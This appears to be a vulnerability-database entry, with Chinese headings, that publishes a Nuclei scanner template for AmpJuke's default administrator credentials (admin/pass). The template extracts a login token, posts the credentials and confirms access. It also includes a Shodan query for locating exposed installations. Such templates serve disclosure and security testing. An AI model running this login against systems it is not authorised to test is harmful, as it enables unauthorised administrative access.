漏洞描述
AmpJuke contains a default login vulnerability. Default admin login password 'pass' was found.
ampjuke-default-login: AmpJuke - Default Login
PoC代码[已公开]
id: ampjuke-default-login
info:
name: AmpJuke - Default Login
author: ritikchaddha
severity: high
description: |
AmpJuke contains a default login vulnerability. Default admin login password 'pass' was found.
metadata:
max-request: 3
shodan-query: "http.favicon.hash:-121681558"
tags: default-login,ampjuke,vuln
http:
- raw:
- |
GET /login.php HTTP/1.1
Host: {{Hostname}}
- |
POST /loginvalidate.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
uuid={{url_encode(token)}}&login={{username}}&password={{password}}&Submit=Submit
- |
GET /index.php?what=welcome HTTP/1.1
Host: {{Hostname}}
attack: pitchfork
payloads:
username:
- admin
password:
- pass
matchers-condition: and
matchers:
- type: word
part: body_3
words:
- 'AmpJuke'
- 'Track'
- 'Logout'
- 'Random play'
condition: and
case-insensitive: true
- type: status
status:
- 200
extractors:
- type: regex
part: body_1
name: token
group: 1
regex:
- 'name="uuid" value="([./a-z0-9-]+)">'
internal: true
# digest: 4a0a004730450220192793481d66e9b4e93267371db4f3f5be275c31f6716eeae307dff942783168022100b5a454179aa6b76122cc2600453c2d72ef0dc743526f8303411d97f082362f06:922c64590222798bb761d5b6d8e72950